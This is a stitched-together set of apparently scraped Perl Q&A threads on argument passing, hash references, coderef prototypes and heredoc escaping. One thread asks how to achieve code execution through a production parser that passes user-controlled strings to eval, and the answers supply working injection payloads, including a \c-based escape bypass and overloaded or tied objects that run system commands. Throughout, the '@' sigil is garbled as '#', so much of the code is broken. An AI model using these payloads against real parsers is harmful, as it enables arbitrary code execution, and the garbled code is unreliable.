I'm trying to send arguments to a function and then in that function, join the arguments to make a string.
The code I'm trying
method send_data(\#args) {
my $string = join('%', #args);
print $string . '\n';
}
send_data('test1', 'test2', 'test3');
I know I could do it this way:
my #params = ('test1', 'test2', 'test3');
send_data(\#params);
But I prefer the first method. Without Method::Signatures you would do it this way:
sub send_data {
my (#args) = #_;
my $string = join('%', #args);
print $string . '\n';
}
send_data('test1', 'test2', 'test3');
Help?
With Method::Signatures, if you use method then the first parameter gets consumed as an implicit $self variable leaving only the remaining parameters in #args.
As this function isn't part of a class you should be using func instead of method and in this particular case there's no need for the \ either:
func send_data(#args) {
my $string = join('%', #args);
print $string . '\n';
}
send_data('test1', 'test2', 'test3');
NB: this will also print the literal string \n - if you wanted an actual newline you must enclose the \n in double quotes instead of single quotes.
Related
Given the following Perl code, how could one get code execution if they control $foo?
sub Parse($)
{
my $dataPt = shift;
my (#toks, $tok, $more);
Tok: for (;;) {
# find the next token
last unless $$dataPt =~ /(\S)/sg; # get next non-space character
if ($1 eq '(') { # start of list
$tok = Parse($dataPt);
} elsif ($1 eq ')') { # end of list
$more = 1;
last;
} elsif ($1 eq '"') { # quoted string
$tok = '';
for (;;) {
my $pos = pos($$dataPt);
last Tok unless $$dataPt =~ /"/sg;
$tok .= substr($$dataPt, $pos, pos($$dataPt)-1-$pos);
# we're good unless quote was escaped by odd number of backslashes
last unless $tok =~ /(\\+)$/ and length($1) & 0x01;
print("here\n");
$tok .= '"'; # quote is part of the string
}
# must protect unescaped "$" and "#" symbols, and "\" at end of string
$tok =~ s{\\(.)|([\$\#]|\\$)}{'\\'.($2 || $1)}sge;
# convert C escape sequences (allowed in quoted text)
$tok = eval qq{"$tok"};
} else { # key name
pos($$dataPt) = pos($$dataPt) - 1;
# allow anything in key but whitespace, braces and double quotes
# (this is one of those assumptions I mentioned)
$tok = $$dataPt =~ /([^\s()"]+)/sg ? $1 : undef;
}
push #toks, $tok if defined $tok;
}
# prevent further parsing unless more after this
pos($$dataPt) = length $$dataPt unless $more;
return #toks ? \#toks : undef;
}
$foo = '(test(foo "bar"))';
$ref = \$foo;
ParseAnt $ref;
I believe there is a way to force the parsing function to include an unescaped double quote in the $tok variable before it is processed by eval, but I was not successful in doing so.
I cannot provide more information as this code snippet is used in production.
Edit
Since the (well-meant) changes to the question happened to invalidate an early answer I am adding this note, along with the original version for the reader's convenience (what can be seen under revisions anyway) ---
Original version of this question:
Given the following Perl code, how could one get code execution if they control $str?
my $str = "malicious payload";
die if $str =~ /"/;
$str =~ s{\\(.)|([\$\#]|\\$)}{'\\'.($2 || $1)}sge;
eval qq{"$str"};
You can take advantage of \c to eat an inserted escape character.
\c${ print qq{0wn3d\n}; \'' }
The key code is
$str =~ s{\\(.)|([\$\#]|\\$)}{'\\'.($2 || $1)}sge;
This answer focuses on this as this is all that was provided intially.
There are two ways to inject code:
Closing the string literal.
This would require a literal " in the input, or its production by the validator.
Using a construct that allows code to be embedded.
These are:
$BLOCK
#BLOCK
$NAME[ EXPR ], $NAME->[ EXPR ], $BLOCK[ EXPR ], $$NAME[ EXPR ]
#NAME[ EXPR ], $NAME->#[ EXPR ], #BLOCK[ EXPR ], #$NAME[ EXPR ]
$NAME{ EXPR }, $NAME->{ EXPR }, $BLOCK{ EXPR }, $$NAME{ EXPR }
#NAME{ EXPR }, $NAME->#{ EXPR }, #BLOCK{ EXPR }, #$NAME{ EXPR }
Both EXPR and BLOCK can contain executable code.
There are various ways of getting those sequences into a string.
Fooling the validator into thinking something is already escaped.
Causing an an escape to be treated as something else.
Fooling the validator into escaping what would already escape the sequence.
Through removal of characters from the middle.
Taking advantage of $$ or $\ somehow.
The snippet's intent to is to process \ escapes as Perl would.[1] We can take advantage of \c to eat an escape character. \c eats the next character, so we can use before a $ to each the the validator's attempt to escape the $.
\c${ print qq{0wn3d\n}; \'' }
becomes
"\c\${ print qq{0wn3d\n}; \'' }"
which means
do { print qq{0wn3d\n}; chr(0x1C) }
Kudos to #bananabr for finding \c.
This, in of itself, is surely a bug. Write a parser for your language's escapes.
{ package Jail::Breaker;
use overload
'""' => sub {
my ($self) = #_;
if ($self->[0]++ < 1) {
return $self->[1]
} else {
return qq(";system '$self->[1]';")
}
},
fallback => 1;
sub new {
my ($class, $string) = #_;
bless [0, $string], $class
}
}
my $str = 'Jail::Breaker'->new('ls -la /');
die 'invalid' if $str =~ /"/;
$str =~ s{\\(.)|([\$\#]|\\$)}{'\\'.($2 || $1)}sge;
eval qq{"$str"};
or, similarly,
{ package Jail::Breaker;
use Tie::Scalar;
use parent -norequire => 'Tie::StdScalar';
my $fetched;
sub FETCH {
my ($self) = #_;
if ($fetched++) {
return qq(";system'$$self';")
} else {
return $$self
}
}
}
tie my $str, 'Jail::Breaker', 'ls -la /';
...
Both the solutions use an object which returns something else when read for the first time, and the "evil" string when read later.
In Perl, how to dereference temporary hash passed as argument to function?
MyFunct({
Param1 => "knob1",
Param2 => "knob2"
});
# this part never seems to work...
sub MyFunct {
my %param = %{shift()};
my $p1 = $param{Param1};
print "p1: $p1\n";
}
Your code works as is.
$ perl -e'
MyFunct({
Param1 => "knob1",
Param2 => "knob2"
});
# this part never seems to work...
sub MyFunct {
my %param = %{shift()};
my $p1 = $param{Param1};
print "p1: $p1\n";
}
'
p1: knob1
That said, you are needlessly making a copy of the referenced hash. The following is a better approach:
$ perl -e'
MyFunct({
Param1 => "knob1",
Param2 => "knob2"
});
sub MyFunct {
my $param = shift;
my $p1 = $param->{Param1};
print "p1: $p1\n";
}
'
p1: knob1
In addition to #ikegami's answer, I'll add that perhaps you do not need a reference. Passing in the values as key/value pairs will make it easy to convert the list into a hash, using the implicit argument array #_.
The key/value pairs can be performed by using the arrow => delimiter, or in its place a standard comma , delimiter. Below is an example using the arrow.
IDEOne Example
#!/usr/bin/perl
MyFunct(
Param1 => "knob1",
Param2 => "knob2"
);
# this part never seems to work...
sub MyFunct {
my %param = #_;
my $p1 = $param{Param1};
local $\ = "\n";
print "p1: $p1";
print "p2: $param{Param2}";
}
I have a sub that reads a FASTA text file in chunks.
sub reader {
foreach my $line (<IN>) { # read line by line
chomp $line;
if ($line =~ m/^>/) { # if it's a title
&initiator($title, $seq) unless $firsttitle == 1;
$firsttitle = 0;
($title = $line) =~ s/^>//; # title without > at start
$seq = ''; # new seq
} else {
$seq = $seq . $line; # append seq lines
}
}
&initiator($title, $seq); # Do the thing for the last seq.
}
In the middle of several loops, &initiator is called. I'd like to have this in a module that I can "use" but substitute &initiator with other subs from other modules. These subs will need to have their own inputs as well. Would something like the following work or is there a more elegant solution?
use Reader qw(reader);
use Othersub qw(subroutine);
my #par = ('Mary', 'Lamb');
my %functions = (foo => \&Othersub::subroutine);
&reader($file_to_read, $functions{'foo'}($par[0], $par[1]));
Note: Final file structure is Othersub.pm, Reader.pm and the script that uses both modules.
Perl allows you to create references to things, and that includes both subroutines and arrays.
If you've got differing arguments to pass, then I would suggest you want to do so via array reference rather than what you're doing. A bit like this:
use strict;
use warnings;
sub variable_args {
my ( $code_ref, $array_ref ) = #_;
#dereference code ref;
#dereference array ref;
&$code_ref( #$array_ref, "optional", "extra", "arg" );
}
sub foo_func {
foreach (#_) {
print "Foo $_\n";
}
}
sub bar_func {
print "BAR: ", join( ":", #_ ), "\n";
}
#could inline the functions as anonymous subs. I would avoid doing that
#unless they're pretty short/clear.
my %functions = (
'foo' => \&foo_func,
'bar' => \&bar_func,
);
my %args_to_pass = (
'foo' => [ "Mary", "Lamb" ],
'bar' => [ "Some", "Fish", "Pie" ],
);
for my $thing ( "foo", "bar" ) {
variable_args( $functions{$thing}, $args_to_pass{$thing} );
}
Note - in the example above, you call &initiator. You shouldn't do this. It's deprecated syntax from Perl 4, and is redundant (and may have some undesired consequences in certain scenarios).
But I would suggest doing it this way rather than the way you've got. You could get this to work:
&reader($file_to_read, $functions{'foo'}($par[0], $par[1]));
But what will happen when you try and do that is you'll (potentially) just run your function immediately, and pass it's result into reader.
E.g.:
variable_args ( &{$functions{'foo'}}("Mary", "Lamb"), ["more stuff"] );
Won't work, because you're 'running' it immediately, and then sending the result - which'll make your $code_ref whatever the result of the subroutine was.
However you could make an anonymous sub, and pass that:
variable_args( sub {
&{ $functions{'foo'} }( "Special", "Argument", #_ )
},
$args_to_pass{'foo'} );
I would suggest you're getting needlessly convoluted by that point though :)
As far as I can guess, you want to pass a function (reference) as parameter.
Something like this should work for you
# Script
use Reader qw(reader);
use Othersub qw(subroutine);
my #par = .... ;
reader( $file_to_read , \&subroutine , #par);
# Reader.pm
sub reader {
my $file = shift;
my $initiator = shift;
my #par = #_;
...
$initiator->( $file , #par)
...
}
Remark: In the last line of your code, you are not passing the function subroutine to reader, as you might have intendend; instead, you invoke it and pass the result of soubroutine, given the paramers par to reader.
$i=1;
while($i<3) {
print << "EOT";
def px$i = new E(user)
if (!px$i.hasErrors()) {
println "${px$i.name} / ${px$i.empr.to} OK"
}
EOT
$i++;
}
produces the error:
Can't call method "px" without a package or object reference at borrar.pl line 3.
How can I "escape" the if ?
Thanks.
It's kind of hard to tell what this code is supposed to accomplish, but maybe you want the outer dollar signs in the println statement to be preserved in the final output?
println "\${px$i.name} / \${px$i.empr.to} OK"
With that change, the error-free output I see is:
def px1 = new E(user)
if (!px1.hasErrors()) {
println "${px1.name} / ${px1.empr.to} OK"
}
def px2 = new E(user)
if (!px2.hasErrors()) {
println "${px2.name} / ${px2.empr.to} OK"
}
The command line option -MO=Deparse shows you how Perl has interpreted your code after simplifying it (e.g. converting heredocs to qq{} blocks). e.g.
$ perl -MO=Deparse test.pl
$i = 1;
while ($i < 3) {
print qq[ def px$i = new E(user) \n if (!px$i.hasErrors()) {\n println "${$i->px . 'name';} / ${$i->px . 'empr' . 'to';} OK"\n }\n\n];
++$i;
}
The relevant part is:
println "${$i->px . 'name';} / ${$i->px . 'empr' . 'to';}
Perl has converted ${px$i.name} to ${$i->px . 'name'} !
In perl, ${...} means to evaluate whatever is inside the block, and treat it as a symbolic reference (i.e. a variable name) or a scalar reference, then dereference it to turn it back into a scalar. So Perl tries to execute whatever is inside those blocks, treating their contents as Perl code. This is because your heredoc, "EOT" is like a double-quoted string, and interpolates dollar signs.
Solution is: escape your dollar signs ($ -> \$) or use single quotes and concatenation rather than heredocs.
This should fix the problem.
println "${"px$i.name"} / ${"px$i.empr.to"} OK"
println "px$i.name" / px$i.empr.to OK"
As you have seen, the $px part of the string is getting evaluated. You simply need to escape it:
$i=1;
while($i<3) {
print << "EOT";
def px$i = new E(user)
if (!px$i.hasErrors()) {
println "\${px$i.name} / \${px$i.empr.to} OK"
}
EOT
$i++;
}
Read more about string escaping at perldoc perlop under "Gory details of parsing quoted constructs".
my $format = << 'EOT';
def px%d = new E(user)
if (!px%d.hasErrors()) {
println "${px%d.name} / ${px%d.empr.to} OK"
}
EOT
for my $i ( 1 .. 3 ) {
printf $format, ($i) x 4;
}
This is the code:
sub function($&) {
my $param1 = shift;
my $code = shift;
# do something with $param1 and $code
}
If I try to call it like this:
function("whatever") {
print "i'm inside the coderef\n";
}
I get Not enough arguments for MyPackage::function at x.pl line 5, near ""whatever" { ". How can I call it without having to add sub in front of the code block?
Put the coderef argument first:
sub function (&$) {
my $code = shift;
my $param1 = shift;
# do something with $param1 and $code
}
function { print "i'm inside the coderef\n" } "whatever";
See the perlsub man page, which reads in part:
An "&" requires an anonymous subroutine, which, if passed as the first argument,
does not require the "sub" keyword or a subsequent comma.
Here,
$& is a Perl's special variable which is used to match the exact pattern. (you have wrongly used it in your context)
$` is used to match the string before the given pattern.
$' is used to match the string after the given pattern.